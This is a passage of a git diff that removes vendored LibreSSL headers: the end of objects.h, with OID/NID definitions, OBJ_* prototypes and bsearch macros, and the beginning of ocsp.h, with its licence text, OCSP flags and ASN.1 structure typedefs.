-#define OBJ_uniqueIdentifier		OBJ_X509,45L
-
-#define SN_crl_distribution_points	"crlDistributionPoints"
-#define LN_crl_distribution_points	"X509v3 CRL Distribution Points"
-#define NID_crl_distribution_points	103
-#define OBJ_crl_distribution_points	OBJ_id_ce,31L
-
-#define SN_md5WithRSA			"RSA-NP-MD5"
-#define LN_md5WithRSA			"md5WithRSA"
-#define NID_md5WithRSA			104
-#define OBJ_md5WithRSA			OBJ_algorithm,3L
-
-#define SN_serialNumber			"SN"
-#define LN_serialNumber			"serialNumber"
-#define NID_serialNumber		105
-#define OBJ_serialNumber		OBJ_X509,5L
-
-#define SN_title			"T"
-#define LN_title			"title"
-#define NID_title			106
-#define OBJ_title			OBJ_X509,12L
-
-#define SN_description			"D"
-#define LN_description			"description"
-#define NID_description			107
-#define OBJ_description			OBJ_X509,13L
-
-/* CAST5 is CAST-128, I'm just sticking with the documentation */
-#define SN_cast5_cbc			"CAST5-CBC"
-#define LN_cast5_cbc			"cast5-cbc"
-#define NID_cast5_cbc			108
-#define OBJ_cast5_cbc			1L,2L,840L,113533L,7L,66L,10L
-
-#define SN_cast5_ecb			"CAST5-ECB"
-#define LN_cast5_ecb			"cast5-ecb"
-#define NID_cast5_ecb			109
-
-#define SN_cast5_cfb64			"CAST5-CFB"
-#define LN_cast5_cfb64			"cast5-cfb"
-#define NID_cast5_cfb64			110
-
-#define SN_cast5_ofb64			"CAST5-OFB"
-#define LN_cast5_ofb64			"cast5-ofb"
-#define NID_cast5_ofb64			111
-
-#define LN_pbeWithMD5AndCast5_CBC	"pbeWithMD5AndCast5CBC"
-#define NID_pbeWithMD5AndCast5_CBC	112
-#define OBJ_pbeWithMD5AndCast5_CBC	1L,2L,840L,113533L,7L,66L,12L
-
-/* This is one sun will soon be using :-(
- * id-dsa-with-sha1 ID  ::= {
- *   iso(1) member-body(2) us(840) x9-57 (10040) x9cm(4) 3 }
- */
-#define SN_dsaWithSHA1			"DSA-SHA1"
-#define LN_dsaWithSHA1			"dsaWithSHA1"
-#define NID_dsaWithSHA1			113
-#define OBJ_dsaWithSHA1			1L,2L,840L,10040L,4L,3L
-
-#define NID_md5_sha1			114
-#define SN_md5_sha1			"MD5-SHA1"
-#define LN_md5_sha1			"md5-sha1"
-
-#define SN_sha1WithRSA			"RSA-SHA1-2"
-#define LN_sha1WithRSA			"sha1WithRSA"
-#define NID_sha1WithRSA			115
-#define OBJ_sha1WithRSA			OBJ_algorithm,29L
-
-#define SN_dsa				"DSA"
-#define LN_dsa				"dsaEncryption"
-#define NID_dsa				116
-#define OBJ_dsa				1L,2L,840L,10040L,4L,1L
-
-#define SN_ripemd160			"RIPEMD160"
-#define LN_ripemd160			"ripemd160"
-#define NID_ripemd160			117
-#define OBJ_ripemd160			1L,3L,36L,3L,2L,1L
-
-/* The name should actually be rsaSignatureWithripemd160, but I'm going
- * to continue using the convention I'm using with the other ciphers */
-#define SN_ripemd160WithRSA		"RSA-RIPEMD160"
-#define LN_ripemd160WithRSA		"ripemd160WithRSA"
-#define NID_ripemd160WithRSA		119
-#define OBJ_ripemd160WithRSA		1L,3L,36L,3L,3L,1L,2L
-
-/* Taken from rfc2040
- *  RC5_CBC_Parameters ::= SEQUENCE {
- *	version           INTEGER (v1_0(16)),
- *	rounds            INTEGER (8..127),
- *	blockSizeInBits   INTEGER (64, 128),
- *	iv                OCTET STRING OPTIONAL
- *	}
- */
-#define SN_rc5_cbc			"RC5-CBC"
-#define LN_rc5_cbc			"rc5-cbc"
-#define NID_rc5_cbc			120
-#define OBJ_rc5_cbc			OBJ_rsadsi,3L,8L
-
-#define SN_rc5_ecb			"RC5-ECB"
-#define LN_rc5_ecb			"rc5-ecb"
-#define NID_rc5_ecb			121
-
-#define SN_rc5_cfb64			"RC5-CFB"
-#define LN_rc5_cfb64			"rc5-cfb"
-#define NID_rc5_cfb64			122
-
-#define SN_rc5_ofb64			"RC5-OFB"
-#define LN_rc5_ofb64			"rc5-ofb"
-#define NID_rc5_ofb64			123
-
-#define SN_rle_compression		"RLE"
-#define LN_rle_compression		"run length compression"
-#define NID_rle_compression		124
-#define OBJ_rle_compression		1L,1L,1L,1L,666L,1L
-
-#define SN_zlib_compression		"ZLIB"
-#define LN_zlib_compression		"zlib compression"
-#define NID_zlib_compression		125
-#define OBJ_zlib_compression		1L,1L,1L,1L,666L,2L
-
-#define SN_ext_key_usage		"extendedKeyUsage"
-#define LN_ext_key_usage		"X509v3 Extended Key Usage"
-#define NID_ext_key_usage		126
-#define OBJ_ext_key_usage		OBJ_id_ce,37
-
-#define SN_id_pkix			"PKIX"
-#define NID_id_pkix			127
-#define OBJ_id_pkix			1L,3L,6L,1L,5L,5L,7L
-
-#define SN_id_kp			"id-kp"
-#define NID_id_kp			128
-#define OBJ_id_kp			OBJ_id_pkix,3L
-
-/* PKIX extended key usage OIDs */
-
-#define SN_server_auth			"serverAuth"
-#define LN_server_auth			"TLS Web Server Authentication"
-#define NID_server_auth			129
-#define OBJ_server_auth			OBJ_id_kp,1L
-
-#define SN_client_auth			"clientAuth"
-#define LN_client_auth			"TLS Web Client Authentication"
-#define NID_client_auth			130
-#define OBJ_client_auth			OBJ_id_kp,2L
-
-#define SN_code_sign			"codeSigning"
-#define LN_code_sign			"Code Signing"
-#define NID_code_sign			131
-#define OBJ_code_sign			OBJ_id_kp,3L
-
-#define SN_email_protect		"emailProtection"
-#define LN_email_protect		"E-mail Protection"
-#define NID_email_protect		132
-#define OBJ_email_protect		OBJ_id_kp,4L
-
-#define SN_time_stamp			"timeStamping"
-#define LN_time_stamp			"Time Stamping"
-#define NID_time_stamp			133
-#define OBJ_time_stamp			OBJ_id_kp,8L
-
-/* Additional extended key usage OIDs: Microsoft */
-
-#define SN_ms_code_ind			"msCodeInd"
-#define LN_ms_code_ind			"Microsoft Individual Code Signing"
-#define NID_ms_code_ind			134
-#define OBJ_ms_code_ind			1L,3L,6L,1L,4L,1L,311L,2L,1L,21L
-
-#define SN_ms_code_com			"msCodeCom"
-#define LN_ms_code_com			"Microsoft Commercial Code Signing"
-#define NID_ms_code_com			135
-#define OBJ_ms_code_com			1L,3L,6L,1L,4L,1L,311L,2L,1L,22L
-
-#define SN_ms_ctl_sign			"msCTLSign"
-#define LN_ms_ctl_sign			"Microsoft Trust List Signing"
-#define NID_ms_ctl_sign			136
-#define OBJ_ms_ctl_sign			1L,3L,6L,1L,4L,1L,311L,10L,3L,1L
-
-#define SN_ms_sgc			"msSGC"
-#define LN_ms_sgc			"Microsoft Server Gated Crypto"
-#define NID_ms_sgc			137
-#define OBJ_ms_sgc			1L,3L,6L,1L,4L,1L,311L,10L,3L,3L
-
-#define SN_ms_efs			"msEFS"
-#define LN_ms_efs			"Microsoft Encrypted File System"
-#define NID_ms_efs			138
-#define OBJ_ms_efs			1L,3L,6L,1L,4L,1L,311L,10L,3L,4L
-
-/* Additional usage: Netscape */
-
-#define SN_ns_sgc			"nsSGC"
-#define LN_ns_sgc			"Netscape Server Gated Crypto"
-#define NID_ns_sgc			139
-#define OBJ_ns_sgc			OBJ_netscape,4L,1L
-
-#define SN_delta_crl			"deltaCRL"
-#define LN_delta_crl			"X509v3 Delta CRL Indicator"
-#define NID_delta_crl			140
-#define OBJ_delta_crl			OBJ_id_ce,27L
-
-#define SN_crl_reason			"CRLReason"
-#define LN_crl_reason			"CRL Reason Code"
-#define NID_crl_reason			141
-#define OBJ_crl_reason			OBJ_id_ce,21L
-
-#define SN_invalidity_date		"invalidityDate"
-#define LN_invalidity_date		"Invalidity Date"
-#define NID_invalidity_date		142
-#define OBJ_invalidity_date		OBJ_id_ce,24L
-
-#define SN_sxnet			"SXNetID"
-#define LN_sxnet			"Strong Extranet ID"
-#define NID_sxnet			143
-#define OBJ_sxnet			1L,3L,101L,1L,4L,1L
-
-/* PKCS12 and related OBJECT IDENTIFIERS */
-
-#define OBJ_pkcs12			OBJ_pkcs,12L
-#define OBJ_pkcs12_pbeids		OBJ_pkcs12, 1
-
-#define SN_pbe_WithSHA1And128BitRC4	"PBE-SHA1-RC4-128"
-#define LN_pbe_WithSHA1And128BitRC4	"pbeWithSHA1And128BitRC4"
-#define NID_pbe_WithSHA1And128BitRC4	144
-#define OBJ_pbe_WithSHA1And128BitRC4	OBJ_pkcs12_pbeids, 1L
-
-#define SN_pbe_WithSHA1And40BitRC4	"PBE-SHA1-RC4-40"
-#define LN_pbe_WithSHA1And40BitRC4	"pbeWithSHA1And40BitRC4"
-#define NID_pbe_WithSHA1And40BitRC4	145
-#define OBJ_pbe_WithSHA1And40BitRC4	OBJ_pkcs12_pbeids, 2L
-
-#define SN_pbe_WithSHA1And3_Key_TripleDES_CBC	"PBE-SHA1-3DES"
-#define LN_pbe_WithSHA1And3_Key_TripleDES_CBC	"pbeWithSHA1And3-KeyTripleDES-CBC"
-#define NID_pbe_WithSHA1And3_Key_TripleDES_CBC	146
-#define OBJ_pbe_WithSHA1And3_Key_TripleDES_CBC	OBJ_pkcs12_pbeids, 3L
-
-#define SN_pbe_WithSHA1And2_Key_TripleDES_CBC	"PBE-SHA1-2DES"
-#define LN_pbe_WithSHA1And2_Key_TripleDES_CBC	"pbeWithSHA1And2-KeyTripleDES-CBC"
-#define NID_pbe_WithSHA1And2_Key_TripleDES_CBC	147
-#define OBJ_pbe_WithSHA1And2_Key_TripleDES_CBC	OBJ_pkcs12_pbeids, 4L
-
-#define SN_pbe_WithSHA1And128BitRC2_CBC		"PBE-SHA1-RC2-128"
-#define LN_pbe_WithSHA1And128BitRC2_CBC		"pbeWithSHA1And128BitRC2-CBC"
-#define NID_pbe_WithSHA1And128BitRC2_CBC	148
-#define OBJ_pbe_WithSHA1And128BitRC2_CBC	OBJ_pkcs12_pbeids, 5L
-
-#define SN_pbe_WithSHA1And40BitRC2_CBC	"PBE-SHA1-RC2-40"
-#define LN_pbe_WithSHA1And40BitRC2_CBC	"pbeWithSHA1And40BitRC2-CBC"
-#define NID_pbe_WithSHA1And40BitRC2_CBC	149
-#define OBJ_pbe_WithSHA1And40BitRC2_CBC	OBJ_pkcs12_pbeids, 6L
-
-#define OBJ_pkcs12_Version1	OBJ_pkcs12, 10L
-
-#define OBJ_pkcs12_BagIds	OBJ_pkcs12_Version1, 1L
-
-#define LN_keyBag		"keyBag"
-#define NID_keyBag		150
-#define OBJ_keyBag		OBJ_pkcs12_BagIds, 1L
-
-#define LN_pkcs8ShroudedKeyBag	"pkcs8ShroudedKeyBag"
-#define NID_pkcs8ShroudedKeyBag	151
-#define OBJ_pkcs8ShroudedKeyBag	OBJ_pkcs12_BagIds, 2L
-
-#define LN_certBag		"certBag"
-#define NID_certBag		152
-#define OBJ_certBag		OBJ_pkcs12_BagIds, 3L
-
-#define LN_crlBag		"crlBag"
-#define NID_crlBag		153
-#define OBJ_crlBag		OBJ_pkcs12_BagIds, 4L
-
-#define LN_secretBag		"secretBag"
-#define NID_secretBag		154
-#define OBJ_secretBag		OBJ_pkcs12_BagIds, 5L
-
-#define LN_safeContentsBag	"safeContentsBag"
-#define NID_safeContentsBag	155
-#define OBJ_safeContentsBag	OBJ_pkcs12_BagIds, 6L
-
-#define LN_friendlyName		"friendlyName"
-#define	NID_friendlyName	156
-#define OBJ_friendlyName	OBJ_pkcs9, 20L
-
-#define LN_localKeyID		"localKeyID"
-#define	NID_localKeyID		157
-#define OBJ_localKeyID		OBJ_pkcs9, 21L
-
-#define OBJ_certTypes		OBJ_pkcs9, 22L
-
-#define LN_x509Certificate	"x509Certificate"
-#define	NID_x509Certificate	158
-#define OBJ_x509Certificate	OBJ_certTypes, 1L
-
-#define LN_sdsiCertificate	"sdsiCertificate"
-#define	NID_sdsiCertificate	159
-#define OBJ_sdsiCertificate	OBJ_certTypes, 2L
-
-#define OBJ_crlTypes		OBJ_pkcs9, 23L
-
-#define LN_x509Crl		"x509Crl"
-#define	NID_x509Crl		160
-#define OBJ_x509Crl		OBJ_crlTypes, 1L
-
-/* PKCS#5 v2 OIDs */
-
-#define LN_pbes2		"PBES2"
-#define NID_pbes2		161
-#define OBJ_pbes2		OBJ_pkcs,5L,13L
-
-#define LN_pbmac1		"PBMAC1"
-#define NID_pbmac1		162
-#define OBJ_pbmac1		OBJ_pkcs,5L,14L
-
-#define LN_hmacWithSHA1		"hmacWithSHA1"
-#define NID_hmacWithSHA1	163
-#define OBJ_hmacWithSHA1	OBJ_rsadsi,2L,7L
-
-/* Policy Qualifier Ids */
-
-#define LN_id_qt_cps		"Policy Qualifier CPS"
-#define SN_id_qt_cps		"id-qt-cps"
-#define NID_id_qt_cps		164
-#define OBJ_id_qt_cps		OBJ_id_pkix,2L,1L
-
-#define LN_id_qt_unotice	"Policy Qualifier User Notice"
-#define SN_id_qt_unotice	"id-qt-unotice"
-#define NID_id_qt_unotice	165
-#define OBJ_id_qt_unotice	OBJ_id_pkix,2L,2L
-
-#define SN_rc2_64_cbc			"RC2-64-CBC"
-#define LN_rc2_64_cbc			"rc2-64-cbc"
-#define NID_rc2_64_cbc			166
-
-#define SN_SMIMECapabilities		"SMIME-CAPS"
-#define LN_SMIMECapabilities		"S/MIME Capabilities"
-#define NID_SMIMECapabilities		167
-#define OBJ_SMIMECapabilities		OBJ_pkcs9,15L
-
-#define SN_pbeWithMD2AndRC2_CBC		"PBE-MD2-RC2-64"
-#define LN_pbeWithMD2AndRC2_CBC		"pbeWithMD2AndRC2-CBC"
-#define NID_pbeWithMD2AndRC2_CBC	168
-#define OBJ_pbeWithMD2AndRC2_CBC	OBJ_pkcs,5L,4L
-
-#define SN_pbeWithMD5AndRC2_CBC		"PBE-MD5-RC2-64"
-#define LN_pbeWithMD5AndRC2_CBC		"pbeWithMD5AndRC2-CBC"
-#define NID_pbeWithMD5AndRC2_CBC	169
-#define OBJ_pbeWithMD5AndRC2_CBC	OBJ_pkcs,5L,6L
-
-#define SN_pbeWithSHA1AndDES_CBC	"PBE-SHA1-DES"
-#define LN_pbeWithSHA1AndDES_CBC	"pbeWithSHA1AndDES-CBC"
-#define NID_pbeWithSHA1AndDES_CBC	170
-#define OBJ_pbeWithSHA1AndDES_CBC	OBJ_pkcs,5L,10L
-
-/* Extension request OIDs */
-
-#define LN_ms_ext_req			"Microsoft Extension Request"
-#define SN_ms_ext_req			"msExtReq"
-#define NID_ms_ext_req			171
-#define OBJ_ms_ext_req			1L,3L,6L,1L,4L,1L,311L,2L,1L,14L
-
-#define LN_ext_req			"Extension Request"
-#define SN_ext_req			"extReq"
-#define NID_ext_req			172
-#define OBJ_ext_req			OBJ_pkcs9,14L
-
-#define SN_name				"name"
-#define LN_name				"name"
-#define NID_name			173
-#define OBJ_name			OBJ_X509,41L
-
-#define SN_dnQualifier			"dnQualifier"
-#define LN_dnQualifier			"dnQualifier"
-#define NID_dnQualifier			174
-#define OBJ_dnQualifier			OBJ_X509,46L
-
-#define SN_id_pe			"id-pe"
-#define NID_id_pe			175
-#define OBJ_id_pe			OBJ_id_pkix,1L
-
-#define SN_id_ad			"id-ad"
-#define NID_id_ad			176
-#define OBJ_id_ad			OBJ_id_pkix,48L
-
-#define SN_info_access			"authorityInfoAccess"
-#define LN_info_access			"Authority Information Access"
-#define NID_info_access			177
-#define OBJ_info_access			OBJ_id_pe,1L
-
-#define SN_ad_OCSP			"OCSP"
-#define LN_ad_OCSP			"OCSP"
-#define NID_ad_OCSP			178
-#define OBJ_ad_OCSP			OBJ_id_ad,1L
-
-#define SN_ad_ca_issuers		"caIssuers"
-#define LN_ad_ca_issuers		"CA Issuers"
-#define NID_ad_ca_issuers		179
-#define OBJ_ad_ca_issuers		OBJ_id_ad,2L
-
-#define SN_OCSP_sign			"OCSPSigning"
-#define LN_OCSP_sign			"OCSP Signing"
-#define NID_OCSP_sign			180
-#define OBJ_OCSP_sign			OBJ_id_kp,9L
-#endif /* USE_OBJ_MAC */
-
-#include <openssl/bio.h>
-#include <openssl/asn1.h>
-
-#define	OBJ_NAME_TYPE_UNDEF		0x00
-#define	OBJ_NAME_TYPE_MD_METH		0x01
-#define	OBJ_NAME_TYPE_CIPHER_METH	0x02
-#define	OBJ_NAME_TYPE_PKEY_METH		0x03
-#define	OBJ_NAME_TYPE_COMP_METH		0x04
-#define	OBJ_NAME_TYPE_NUM		0x05
-
-#define	OBJ_NAME_ALIAS			0x8000
-
-#define OBJ_BSEARCH_VALUE_ON_NOMATCH		0x01
-#define OBJ_BSEARCH_FIRST_VALUE_ON_MATCH	0x02
-
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct obj_name_st {
-	int type;
-	int alias;
-	const char *name;
-	const char *data;
-} OBJ_NAME;
-
-#define		OBJ_create_and_add_object(a,b,c) OBJ_create(a,b,c)
-
-
-int OBJ_NAME_init(void);
-int OBJ_NAME_new_index(unsigned long (*hash_func)(const char *),
-    int (*cmp_func)(const char *, const char *),
-    void (*free_func)(const char *, int, const char *));
-const char *OBJ_NAME_get(const char *name, int type);
-int OBJ_NAME_add(const char *name, int type, const char *data);
-int OBJ_NAME_remove(const char *name, int type);
-void OBJ_NAME_cleanup(int type); /* -1 for everything */
-void OBJ_NAME_do_all(int type, void (*fn)(const OBJ_NAME *, void *arg),
-    void *arg);
-void OBJ_NAME_do_all_sorted(int type, void (*fn)(const OBJ_NAME *, void *arg),
-    void *arg);
-
-ASN1_OBJECT *	OBJ_dup(const ASN1_OBJECT *o);
-ASN1_OBJECT *	OBJ_nid2obj(int n);
-const char *	OBJ_nid2ln(int n);
-const char *	OBJ_nid2sn(int n);
-int		OBJ_obj2nid(const ASN1_OBJECT *o);
-ASN1_OBJECT *	OBJ_txt2obj(const char *s, int no_name);
-int	OBJ_obj2txt(char *buf, int buf_len, const ASN1_OBJECT *a, int no_name);
-int		OBJ_txt2nid(const char *s);
-int		OBJ_ln2nid(const char *s);
-int		OBJ_sn2nid(const char *s);
-int		OBJ_cmp(const ASN1_OBJECT *a, const ASN1_OBJECT *b);
-const void *	OBJ_bsearch_(const void *key, const void *base, int num,
-		    int size, int (*cmp)(const void *, const void *));
-const void *	OBJ_bsearch_ex_(const void *key, const void *base, int num,
-		    int size, int (*cmp)(const void *, const void *),
-		    int flags);
-
-#ifndef LIBRESSL_INTERNAL
-
-#define _DECLARE_OBJ_BSEARCH_CMP_FN(scope, type1, type2, nm)	\
-  static int nm##_cmp_BSEARCH_CMP_FN(const void *, const void *); \
-  static int nm##_cmp(type1 const *, type2 const *); \
-  scope type2 * OBJ_bsearch_##nm(type1 *key, type2 const *base, int num)
-
-#define DECLARE_OBJ_BSEARCH_CMP_FN(type1, type2, cmp)	\
-  _DECLARE_OBJ_BSEARCH_CMP_FN(static, type1, type2, cmp)
-#define DECLARE_OBJ_BSEARCH_GLOBAL_CMP_FN(type1, type2, nm)	\
-  type2 * OBJ_bsearch_##nm(type1 *key, type2 const *base, int num)
-
-/*
- * Unsolved problem: if a type is actually a pointer type, like
- * nid_triple is, then its impossible to get a const where you need
- * it. Consider:
- *
- * typedef int nid_triple[3];
- * const void *a_;
- * const nid_triple const *a = a_;
- *
- * The assignement discards a const because what you really want is:
- *
- * const int const * const *a = a_;
- *
- * But if you do that, you lose the fact that a is an array of 3 ints,
- * which breaks comparison functions.
- *
- * Thus we end up having to cast, sadly, or unpack the
- * declarations. Or, as I finally did in this case, delcare nid_triple
- * to be a struct, which it should have been in the first place.
- *
- * Ben, August 2008.
- *
- * Also, strictly speaking not all types need be const, but handling
- * the non-constness means a lot of complication, and in practice
- * comparison routines do always not touch their arguments.
- */
-
-#define IMPLEMENT_OBJ_BSEARCH_CMP_FN(type1, type2, nm)	\
-  static int nm##_cmp_BSEARCH_CMP_FN(const void *a_, const void *b_)	\
-      { \
-      type1 const *a = a_; \
-      type2 const *b = b_; \
-      return nm##_cmp(a,b); \
-      } \
-  static type2 *OBJ_bsearch_##nm(type1 *key, type2 const *base, int num) \
-      { \
-      return (type2 *)OBJ_bsearch_(key, base, num, sizeof(type2), \
-					nm##_cmp_BSEARCH_CMP_FN); \
-      } \
-      extern void dummy_prototype(void)
-
-#define IMPLEMENT_OBJ_BSEARCH_GLOBAL_CMP_FN(type1, type2, nm)	\
-  static int nm##_cmp_BSEARCH_CMP_FN(const void *a_, const void *b_)	\
-      { \
-      type1 const *a = a_; \
-      type2 const *b = b_; \
-      return nm##_cmp(a,b); \
-      } \
-  type2 *OBJ_bsearch_##nm(type1 *key, type2 const *base, int num) \
-      { \
-      return (type2 *)OBJ_bsearch_(key, base, num, sizeof(type2), \
-					nm##_cmp_BSEARCH_CMP_FN); \
-      } \
-      extern void dummy_prototype(void)
-
-#define OBJ_bsearch(type1,key,type2,base,num,cmp)			       \
-  ((type2 *)OBJ_bsearch_(CHECKED_PTR_OF(type1,key),CHECKED_PTR_OF(type2,base), \
-			 num,sizeof(type2),				\
-			 ((void)CHECKED_PTR_OF(type1,cmp##_type_1),	\
-			  (void)CHECKED_PTR_OF(type2,cmp##_type_2),	\
-			  cmp##_BSEARCH_CMP_FN)))
-
-#define OBJ_bsearch_ex(type1,key,type2,base,num,cmp,flags)			\
-  ((type2 *)OBJ_bsearch_ex_(CHECKED_PTR_OF(type1,key),CHECKED_PTR_OF(type2,base), \
-			 num,sizeof(type2),				\
-			 ((void)CHECKED_PTR_OF(type1,cmp##_type_1),	\
-			  (void)type_2=CHECKED_PTR_OF(type2,cmp##_type_2), \
-			  cmp##_BSEARCH_CMP_FN)),flags)
-
-#endif /* !LIBRESSL_INTERNAL */
-
-int		OBJ_new_nid(int num);
-int		OBJ_add_object(const ASN1_OBJECT *obj);
-int		OBJ_create(const char *oid, const char *sn, const char *ln);
-void		OBJ_cleanup(void );
-int		OBJ_create_objects(BIO *in);
-
-int OBJ_find_sigid_algs(int signid, int *pdig_nid, int *ppkey_nid);
-int OBJ_find_sigid_by_algs(int *psignid, int dig_nid, int pkey_nid);
-int OBJ_add_sigid(int signid, int dig_id, int pkey_id);
-void OBJ_sigid_free(void);
-
-extern int obj_cleanup_defer;
-void check_defer(int nid);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_OBJ_strings(void);
-
-/* Error codes for the OBJ functions. */
-
-/* Function codes. */
-#define OBJ_F_OBJ_ADD_OBJECT				 105
-#define OBJ_F_OBJ_CREATE				 100
-#define OBJ_F_OBJ_DUP					 101
-#define OBJ_F_OBJ_NAME_NEW_INDEX			 106
-#define OBJ_F_OBJ_NID2LN				 102
-#define OBJ_F_OBJ_NID2OBJ				 103
-#define OBJ_F_OBJ_NID2SN				 104
-
-/* Reason codes. */
-#define OBJ_R_MALLOC_FAILURE				 100
-#define OBJ_R_UNKNOWN_NID				 101
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ocsp.h b/thirdparty/libressl/include/openssl/ocsp.h
deleted file mode 100644
index e3fa6f5..0000000
--- a/thirdparty/libressl/include/openssl/ocsp.h
+++ /dev/null
@@ -1,669 +0,0 @@
-/* $OpenBSD: ocsp.h,v 1.11 2016/12/30 16:19:04 jsing Exp $ */
-/* Written by Tom Titchener <Tom_Titchener@groove.net> for the OpenSSL
- * project. */
-
-/* History:
-   This file was transfered to Richard Levitte from CertCo by Kathy
-   Weinhold in mid-spring 2000 to be included in OpenSSL or released
-   as a patch kit. */
-
-/* ====================================================================
- * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_OCSP_H
-#define HEADER_OCSP_H
-
-#include <openssl/ossl_typ.h>
-#include <openssl/x509.h>
-#include <openssl/x509v3.h>
-#include <openssl/safestack.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Various flags and values */
-
-#define OCSP_DEFAULT_NONCE_LENGTH	16
-
-#define OCSP_NOCERTS			0x1
-#define OCSP_NOINTERN			0x2
-#define OCSP_NOSIGS			0x4
-#define OCSP_NOCHAIN			0x8
-#define OCSP_NOVERIFY			0x10
-#define OCSP_NOEXPLICIT			0x20
-#define OCSP_NOCASIGN			0x40
-#define OCSP_NODELEGATED		0x80
-#define OCSP_NOCHECKS			0x100
-#define OCSP_TRUSTOTHER			0x200
-#define OCSP_RESPID_KEY			0x400
-#define OCSP_NOTIME			0x800
-
-/*   CertID ::= SEQUENCE {
- *       hashAlgorithm            AlgorithmIdentifier,
- *       issuerNameHash     OCTET STRING, -- Hash of Issuer's DN
- *       issuerKeyHash      OCTET STRING, -- Hash of Issuers public key (excluding the tag & length fields)
- *       serialNumber       CertificateSerialNumber }
- */
-typedef struct ocsp_cert_id_st {
-	X509_ALGOR *hashAlgorithm;
-	ASN1_OCTET_STRING *issuerNameHash;
-	ASN1_OCTET_STRING *issuerKeyHash;
-	ASN1_INTEGER *serialNumber;
-} OCSP_CERTID;
-
-DECLARE_STACK_OF(OCSP_CERTID)
-
-/*   Request ::=     SEQUENCE {
- *       reqCert                    CertID,
- *       singleRequestExtensions    [0] EXPLICIT Extensions OPTIONAL }
- */
-typedef struct ocsp_one_request_st {
-	OCSP_CERTID *reqCert;
-	STACK_OF(X509_EXTENSION) *singleRequestExtensions;
-} OCSP_ONEREQ;
-
-DECLARE_STACK_OF(OCSP_ONEREQ)
-
-
-/*   TBSRequest      ::=     SEQUENCE {
- *       version             [0] EXPLICIT Version DEFAULT v1,
- *       requestorName       [1] EXPLICIT GeneralName OPTIONAL,
- *       requestList             SEQUENCE OF Request,
- *       requestExtensions   [2] EXPLICIT Extensions OPTIONAL }
- */
-typedef struct ocsp_req_info_st {
-	ASN1_INTEGER *version;
-	GENERAL_NAME *requestorName;
-	STACK_OF(OCSP_ONEREQ) *requestList;
-	STACK_OF(X509_EXTENSION) *requestExtensions;
-} OCSP_REQINFO;
-
-/*   Signature       ::=     SEQUENCE {
- *       signatureAlgorithm   AlgorithmIdentifier,
- *       signature            BIT STRING,
- *       certs                [0] EXPLICIT SEQUENCE OF Certificate OPTIONAL }
- */
-typedef struct ocsp_signature_st {
-	X509_ALGOR *signatureAlgorithm;
-	ASN1_BIT_STRING *signature;
-	STACK_OF(X509) *certs;
-} OCSP_SIGNATURE;
-
-/*   OCSPRequest     ::=     SEQUENCE {
- *       tbsRequest                  TBSRequest,
- *       optionalSignature   [0]     EXPLICIT Signature OPTIONAL }
- */
-typedef struct ocsp_request_st {
-	OCSP_REQINFO *tbsRequest;
-	OCSP_SIGNATURE *optionalSignature; /* OPTIONAL */
-} OCSP_REQUEST;
-
-/*   OCSPResponseStatus ::= ENUMERATED {
- *       successful            (0),      --Response has valid confirmations
- *       malformedRequest      (1),      --Illegal confirmation request
- *       internalError         (2),      --Internal error in issuer
- *       tryLater              (3),      --Try again later
- *                                       --(4) is not used
- *       sigRequired           (5),      --Must sign the request
- *       unauthorized          (6)       --Request unauthorized
- *   }
- */
-#define OCSP_RESPONSE_STATUS_SUCCESSFUL		0
-#define OCSP_RESPONSE_STATUS_MALFORMEDREQUEST	1
-#define OCSP_RESPONSE_STATUS_INTERNALERROR	2
-#define OCSP_RESPONSE_STATUS_TRYLATER		3
-#define OCSP_RESPONSE_STATUS_SIGREQUIRED	5
-#define OCSP_RESPONSE_STATUS_UNAUTHORIZED	6
-
-/*   ResponseBytes ::=       SEQUENCE {
- *       responseType   OBJECT IDENTIFIER,
- *       response       OCTET STRING }
- */
-typedef struct ocsp_resp_bytes_st {
-	ASN1_OBJECT *responseType;
-	ASN1_OCTET_STRING *response;
-} OCSP_RESPBYTES;
-
